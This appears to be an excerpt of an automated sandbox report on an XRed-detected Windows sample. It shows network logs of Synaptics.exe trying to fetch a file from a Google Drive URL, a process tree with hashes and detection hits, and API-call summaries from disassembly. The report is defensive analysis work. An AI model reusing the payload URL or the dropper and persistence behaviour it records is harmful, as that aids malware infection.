                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XufJAAOzCh62lSk_XbowKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.9 | 50172 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5tdblVPX4kA1Ls_N8du8MzppwbFX_erEd8RXdFo281VTW-KFBnjsidPMeNCysXn1OI
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:28 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-n865IQqdIM3DNS5Dsma64g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:30:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:30:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="XxQIpLPwFcH-XVo0zBOUYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:30:29 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.9 | 50173 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:28 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7xKUOk0nJXOphPRu7dzIBUJ-Q0a3Msq588wKhooxEGr57G068vetaXUp32qyyVRWMJDzCw9zw
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:28 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ILNwGMRXRCHWf-1L2_WxlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:30:28 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:30:28 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="7b37sNIW44H0dNl3nPWC2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:30:28 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>



                                                                                            Target ID:0
                                                                                            Start time:14:29:26
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:6'490'624 bytes
                                                                                            MD5 hash:E819C37952E89FF0F473FA9B59CD771D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:14:29:27
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Users\user\Desktop\._cache_file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\._cache_file.exe"
                                                                                            Imagebase:0x1000000
                                                                                            File size:5'718'872 bytes
                                                                                            MD5 hash:630D75210B325A280C3352F879297ED5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:3
                                                                                            Start time:14:29:28
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                            Imagebase:0x400000
                                                                                            File size:771'584 bytes
                                                                                            MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 92%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:14:29:28
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            Imagebase:0x290000
                                                                                            File size:78'152 bytes
                                                                                            MD5 hash:006F8A615020A4A17F5E63801485DF46
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:5
                                                                                            Start time:14:29:29
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x430000
                                                                                            File size:53'161'064 bytes
                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:14:29:38
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:771'584 bytes
                                                                                            MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:Borland Delphi
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:14:29:47
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                                                                                            Imagebase:0x480000
                                                                                            File size:2'801'152 bytes
                                                                                            MD5 hash:61173FF6ABB1C40E3D3B580126FC5F66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:12
                                                                                            Start time:14:29:48
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\splwow64.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                                                            Imagebase:0x7ff708e50000
                                                                                            File size:163'840 bytes
                                                                                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:14
                                                                                            Start time:14:30:00
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                                                                                            Imagebase:0x480000
                                                                                            File size:2'801'152 bytes
                                                                                            MD5 hash:61173FF6ABB1C40E3D3B580126FC5F66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:14:30:15
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860
                                                                                            Imagebase:0xfa0000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:29.4%
                                                                                              Dynamic/Decrypted Code Coverage:74.9%
                                                                                              Signature Coverage:42.7%
                                                                                              Total number of Nodes:705
                                                                                              Total number of Limit Nodes:21

                                                                                              Callgraph


                                                                                              Control-flow Graph for Function_01005899 (graph image not preserved; node legend: Executed / Not Executed)
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0100D060,000000FF), ref: 010058CB
                                                                                              • #17.COMCTL32 ref: 010058DA
                                                                                              • GetProcessHeap.KERNEL32 ref: 010058E0
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 010058FA
                                                                                              • DeleteCriticalSection.KERNEL32(0100D060,20000001), ref: 01005E77
                                                                                              • ExitProcess.KERNEL32 ref: 01005E86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalProcessSection$CountCreateDeleteEventExitHeapInitializeSpin
                                                                                              • String ID: C:\Users\user\Desktop\._cache_file.exe$D$Extracting File:$To Directory:$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$_sfx_manifest_$c:\36a8a8e2fed651ec27d1eed188bb35$c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                              • API String ID: 2862019026-1487908168
                                                                                              • Opcode ID: c3a792d8c2075a35dd7e64b05d9c3b2f4654ac4543c79ca2ca3d8c026a3f3d64
                                                                                              • Instruction ID: c7a1a7c6920ba9a6fd8a3830312b28b74cc00901af42d7916e2ca50266dc036a
                                                                                              • Opcode Fuzzy Hash: c3a792d8c2075a35dd7e64b05d9c3b2f4654ac4543c79ca2ca3d8c026a3f3d64
                                                                                              • Instruction Fuzzy Hash: 06E18070540245BFFB339BA49E89F6A3BA9F705754F1042AAF2C1A50D9DBBA4C40CF61
                                                                                              APIs
                                                                                                • Part of subcall function 010045EB: GetFileAttributesA.KERNELBASE(?), ref: 0100465E
                                                                                                • Part of subcall function 010045EB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004672
                                                                                                • Part of subcall function 010045EB: GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004682
                                                                                                • Part of subcall function 010045EB: DecryptFileA.ADVAPI32(?,00000000), ref: 01004695
                                                                                                • Part of subcall function 010045EB: GetLastError.KERNEL32 ref: 0100469B
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0100502A
                                                                                              • InitializeAcl.ADVAPI32(?,00000100,00000002,?,?,?,?,?), ref: 01005046
                                                                                              • AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 0100506B
                                                                                              • AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01005081
                                                                                              • AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01005097
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?,?,?), ref: 010050AB
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,c:\36a8a8e2fed651ec27d1eed188bb35,?,?,?,?,?), ref: 010050DB
                                                                                              • GetSystemDirectoryA.KERNEL32(c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe ,0000FFFF), ref: 010050F0
                                                                                              • QueryDosDeviceA.KERNEL32(c:\,?,00000400), ref: 01005146
                                                                                              • _strlwr.MSVCRT ref: 01005162
                                                                                              • strstr.MSVCRT ref: 0100517C
                                                                                              • strstr.MSVCRT ref: 01005190
                                                                                              • GetDiskFreeSpaceA.KERNELBASE(005C3A63,?,?,?,?,?,?,?), ref: 010051E8
                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,?,?), ref: 01005357
                                                                                              • CryptGenRandom.ADVAPI32(?,00000010,?,?,?,?,?,?), ref: 01005388
                                                                                              • sprintf.MSVCRT ref: 0100539F
                                                                                              • sprintf.MSVCRT ref: 010053D7
                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?), ref: 0100544B
                                                                                              • GetSystemTime.KERNEL32(?,?,?,?,?,?), ref: 0100547A
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?), ref: 0100548E
                                                                                              • DialogBoxParamA.USER32(0000006B,Function_00003E7A,00000000,?,00000000), ref: 01005501
                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01005601
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,cc:\), ref: 01005615
                                                                                              • SetFileTime.KERNELBASE(DADAFEED,?,?,?,?,00000000,cc:\), ref: 01005627
                                                                                              • CloseHandle.KERNELBASE(DADAFEED,?,00000000,cc:\), ref: 01005630
                                                                                              • SendDlgItemMessageA.USER32(0002041E,0000006A,00000405,00000000,00000000), ref: 01005661
                                                                                              • MoveFileExA.KERNEL32(0100C3A0,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 01005692
                                                                                              • strstr.MSVCRT ref: 0100571A
                                                                                              • _stricmp.MSVCRT(?,_sfx_manifest_,?,00000000,cc:\), ref: 01005742
                                                                                              • SendDlgItemMessageA.USER32(0002041E,00000068,0000000C,00000000,?), ref: 010057A7
                                                                                              • GetLastError.KERNEL32(?,00000000,cc:\), ref: 010057E4
                                                                                                • Part of subcall function 01004590: CreateDirectoryA.KERNELBASE(?,?), ref: 010045B8
                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,00000000,cc:\), ref: 0100584D
                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,?,00000000,cc:\), ref: 01005865
                                                                                              • SetEndOfFile.KERNELBASE(00000000,?,00000000,cc:\), ref: 01005868
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,cc:\), ref: 01005872
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Time$AccessAllowedCryptDirectorySystemstrstr$ContextCreateDescriptorErrorInitializeItemLastMessagePointerSecuritySendsprintf$AcquireAddressAttributesCloseCurrentDaclDateDecryptDeviceDialogDiskFreeHandleLibraryLoadLocalMoveParamProcQueryRandomReleaseSpace_stricmp_strlwr
                                                                                              • String ID: %02x$_sfx_manifest_$c:\36a8a8e2fed651ec27d1eed188bb35$c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe $ccc:\$cdtag.1$harddisk$ramdisk$temp\ext
                                                                                              • API String ID: 1990338833-1726978998
                                                                                              • Opcode ID: fc543d989388e90af9c16f5f6d5131e38cd47ae6136f058cfd03532917dbfc3f
                                                                                              • Instruction ID: cb34d6e19b9d76d7dc8cc1b05be71e2c05cbe8c8c636e12e1b2dadafe6b93270
                                                                                              • Opcode Fuzzy Hash: fc543d989388e90af9c16f5f6d5131e38cd47ae6136f058cfd03532917dbfc3f
                                                                                              • Instruction Fuzzy Hash: 6232A1719006589FFB73DB689C48BEA7BB9AB05346F0041E6E6C9E21C1DB758AC4CF50

                                                                                              Control-flow Graph for Function_010046B9 (graph image not preserved; node legend: Executed / Not Executed)
                                                                                              APIs
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,00000000), ref: 01004730
                                                                                              • strstr.MSVCRT ref: 010047C6
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004801
                                                                                              • GetLastError.KERNEL32 ref: 01004848
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,?), ref: 0100496F
                                                                                              • strstr.MSVCRT ref: 010049D2
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004A0D
                                                                                              • CopyFileA.KERNEL32(?,?,00000000), ref: 01004A22
                                                                                              • GetLastError.KERNEL32 ref: 01004A2E
                                                                                              • CopyFileA.KERNEL32(0100CE20,0100C3A0,00000000), ref: 01004A7C
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004AB3
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,?), ref: 01004B4D
                                                                                              • _strlwr.MSVCRT ref: 01004B8F
                                                                                              • GetLastError.KERNEL32 ref: 01004BCA
                                                                                              • MoveFileA.KERNEL32(?,0100CE20), ref: 01004BEE
                                                                                              • MoveFileA.KERNEL32(0100CE20,?), ref: 01004C1F
                                                                                              • _strlwr.MSVCRT ref: 01004C3E
                                                                                              • strstr.MSVCRT ref: 01004D07
                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 01004D25
                                                                                              • strrchr.MSVCRT ref: 01004D43
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?), ref: 01004D75
                                                                                              • DeleteFileA.KERNEL32(?), ref: 01004D98
                                                                                              • Sleep.KERNEL32(000001F4), ref: 01004DA7
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004DB9
                                                                                              • DeleteFileA.KERNEL32(?), ref: 01004DC6
                                                                                              • FindNextFileA.KERNEL32(?,00000010), ref: 01004DEE
                                                                                              • FindClose.KERNEL32(?), ref: 01004E02
                                                                                              • strchr.MSVCRT ref: 01004E60
                                                                                              • strrchr.MSVCRT ref: 01004F18
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,010022BB,?), ref: 01004F4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ItemMessageSend$Attributes$ErrorFindLaststrstr$CopyDeleteMove_strlwrstrrchr$CloseFirstNextSleepstrchr
                                                                                              • String ID: \..\$c:\36a8a8e2fed651ec27d1eed188bb35$command$copy$delete$deltas$options$run$verify
                                                                                              • API String ID: 3851170777-1313341910
                                                                                              • Opcode ID: 89faf3db3762656d20157f678ec9eb14baf6df118e99a81af9509fb5c0dc1727
                                                                                              • Instruction ID: 1687914c5463bdb562aec54404296a2838319fe0694d4148413fc6cab1dc7c20
                                                                                              • Opcode Fuzzy Hash: 89faf3db3762656d20157f678ec9eb14baf6df118e99a81af9509fb5c0dc1727
                                                                                              • Instruction Fuzzy Hash: 06224E71940219AEFB63DBA4DC48FEA77BDAB14740F0045E6E2C9E2081DB759AC4CF64

                                                                                              Control-flow Graph for Function_010029C2 (graph image not preserved; node legend: Executed / Not Executed)
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000208), ref: 010029FC
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 01002A2B
                                                                                              • GetProcAddress.KERNEL32(00000000,OpenCluster), ref: 01002A47
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseCluster), ref: 01002A5D
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNodeClusterState), ref: 01002A74
                                                                                              • GetProcAddress.KERNEL32(00000000,GetClusterQuorumResource), ref: 01002A82
                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 01002AF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$DirectoryFreeLoadSystem
                                                                                              • String ID: CloseCluster$GetClusterQuorumResource$GetNodeClusterState$OpenCluster$\clusapi.dll
                                                                                              • API String ID: 1303522615-3927317670

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01003D4D
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 01003D5D
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 01003D64
                                                                                              • GetTokenInformation.KERNELBASE(?,00000004,c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe ,00010000,?), ref: 01003D8F
                                                                                              • GetLengthSid.ADVAPI32 ref: 01003DA0
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe ,00010000,?), ref: 01003DE0
                                                                                              • GetLengthSid.ADVAPI32 ref: 01003DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationLengthProcess$AllocateCurrentInitializeOpen
                                                                                              • String ID: c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                              • API String ID: 3439802213-1997848934

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?), ref: 0100465E
